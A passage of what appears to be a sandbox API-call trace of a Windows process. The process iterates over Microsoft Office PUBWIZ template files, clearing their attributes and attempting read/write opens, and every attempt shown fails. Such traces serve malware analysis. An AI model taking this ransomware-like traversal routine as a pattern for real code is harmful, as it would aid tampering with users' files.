dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.751] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.DPV", dwFileAttributes=0x80) returned 0 [0137.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.751] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML", dwFileAttributes=0x80) returned 0 [0137.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.752] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.752] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\HEADINGBB.DPV", dwFileAttributes=0x80) returned 0 [0137.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\HEADINGBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\headingbb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.753] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.753] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\HEADINGBB.POC", dwFileAttributes=0x80) returned 0 [0137.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\HEADINGBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\headingbb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.753] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.753] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.753] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.DPV", dwFileAttributes=0x80) returned 0 [0137.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.754] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML", dwFileAttributes=0x80) returned 0 [0137.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.754] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE11.POC", dwFileAttributes=0x80) returned 0 [0137.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.755] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.DPV", dwFileAttributes=0x80) returned 0 [0137.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.755] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML", dwFileAttributes=0x80) returned 0 [0137.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.756] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL98.POC", dwFileAttributes=0x80) returned 0 [0137.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.756] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABELHM.POC", dwFileAttributes=0x80) returned 0 [0137.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABELHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\labelhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.757] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.DPV", dwFileAttributes=0x80) returned 0 [0137.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.758] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML", dwFileAttributes=0x80) returned 0 [0137.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.758] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LINEACT.POC", dwFileAttributes=0x80) returned 0 [0137.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LINEACT.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\lineact.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.759] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LOGO98.POC", dwFileAttributes=0x80) returned 0 [0137.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LOGO98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\logo98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.759] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD11.POC", dwFileAttributes=0x80) returned 0 [0137.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\lthd11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.760] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD98.POC", dwFileAttributes=0x80) returned 0 [0137.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\lthd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.760] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.761] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD98SP.POC", dwFileAttributes=0x80) returned 0 [0137.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHD98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\lthd98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.761] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.761] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHDHM.POC", dwFileAttributes=0x80) returned 0 [0137.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LTHDHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\lthdhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.762] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML", dwFileAttributes=0x80) returned 0 [0137.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.762] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MARQUEE.POC", dwFileAttributes=0x80) returned 0 [0137.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MARQUEE.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\marquee.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.763] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.DPV", dwFileAttributes=0x80) returned 0 [0137.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.764] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML", dwFileAttributes=0x80) returned 0 [0137.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.765] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU98.POC", dwFileAttributes=0x80) returned 0 [0137.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.765] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MSTHED98.POC", dwFileAttributes=0x80) returned 0 [0137.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MSTHED98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\msthed98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.766] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBAR11.POC", dwFileAttributes=0x80) returned 0 [0137.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBAR11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\navbar11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.766] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBARV.POC", dwFileAttributes=0x80) returned 0 [0137.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBARV.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\navbarv.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.767] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.767] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBRPH1.POC", dwFileAttributes=0x80) returned 0 [0137.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBRPH1.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\navbrph1.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.767] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBRPH2.POC", dwFileAttributes=0x80) returned 0 [0137.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NAVBRPH2.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\navbrph2.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.768] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.DPV", dwFileAttributes=0x80) returned 0 [0137.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 